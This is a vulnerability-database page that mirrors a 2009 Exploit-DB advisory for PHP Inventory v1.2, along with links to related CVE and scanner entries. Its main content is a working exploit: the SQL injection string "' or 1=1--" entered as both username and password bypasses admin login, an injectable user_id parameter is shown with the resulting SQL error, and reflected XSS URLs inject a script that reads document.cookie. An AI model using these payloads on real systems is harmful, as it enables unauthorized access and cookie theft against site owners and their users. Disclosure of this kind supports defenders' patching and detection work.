Lucene search

K

PHP Inventory 1.2 - Authentication Bypass

🗓️ 10 Dec 2009 00:00:00Reported by mr_meType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

PHP Inventory v1.2 Authentication Bypass SQL Injectio

Show more
Related
Code
ReporterTitlePublishedViews
Family
OpenVAS
PHP Inventory < 1.3.2 SQLi Vulnerability
5 Dec 201100:00
openvas
OpenVAS
PHP Inventory Multiple Vulnerabilities
22 Jan 201000:00
openvas
Packet Storm
PHP Inventory 1.3.1 SQL Injection
30 Nov 201100:00
packetstorm
securityvulns
PHP Inventory 1.3.1 Remote &#40;Auth Bypass&#41; SQL Injection Vulnerability
4 Dec 201100:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
5 Dec 201100:00
securityvulns
Cvelist
CVE-2009-4595
12 Jan 201017:00
cvelist
Cvelist
CVE-2009-4596
12 Jan 201017:00
cvelist
Cvelist
CVE-2009-4597
12 Jan 201017:00
cvelist
Prion
Sql injection
12 Jan 201017:30
prion
Prion
Sql injection
12 Jan 201017:30
prion
Rows per page
#################################################################
#
# PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerabiity
# Found By: mr_me
# Download: http://www.phpwares.com/content/php-inventory
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################

First of all lets login to admin with:

http://[server]/php-inventory/index.php

username: ' or 1=1--
password: ' or 1=1--

The app is riddled with SQL Injection. For example:

http://[server]/php-inventory/index.php?sub=users&action=details&user_id=[SQLI]

SELECT * FROM `site_users` WHERE `user_id`='1003''You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1003''' at line 1

This of course means you can do some slightly dodgy refected XSS:

http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id='><script>alert(document.cookie)</script>

I leave the exploiting up to the reader.

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Dec 2009 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.002
27
.json
Report